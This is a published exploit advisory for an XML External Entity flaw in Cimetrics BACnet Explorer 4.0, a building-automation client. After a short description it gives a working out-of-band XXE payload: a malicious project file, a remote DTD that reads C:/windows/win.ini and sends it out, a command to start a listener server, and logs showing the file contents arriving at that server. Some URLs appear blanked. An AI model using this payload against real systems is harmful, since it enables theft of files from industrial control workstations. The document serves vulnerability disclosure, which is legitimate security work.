Cimetrics BACnet Explorer 4.0 - XML External Entity Injection

Ruben Garrote Garca 12.02.2017 Verified Wait
Local Exploits Windows

Exploit Code

Cimetrics BACnet Explorer 4.0 XXE Vulnerability

Vendor: Cimetrics, Inc.
Product web page:
Affected version:

Summary: The BACnet Explorer is a BACnet client application that
helps auto discover BACnet devices.

Desc: BACnetExplorer suffers from an XML External Entity (XXE)
vulnerability using the DTD parameter entities technique resulting
in disclosure and retrieval of arbitrary data on the affected node
via out-of-band (OOB) attack. The vulnerability is triggered when
input passed to the xml parser is not sanitized while parsing the
xml project file.

Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
           mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
           BACstac Library: 1.5.6116.0
           BACstac Service: 6.8.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2017-5398
Advisory URL:



Open file evil.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "">

xxe.xml on the web server:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM ';'> ">

pyhon -m SimpleHTTPServer 8080

lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER= HTTP/1.1" 301 -
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER= HTTP/1.1" 200 -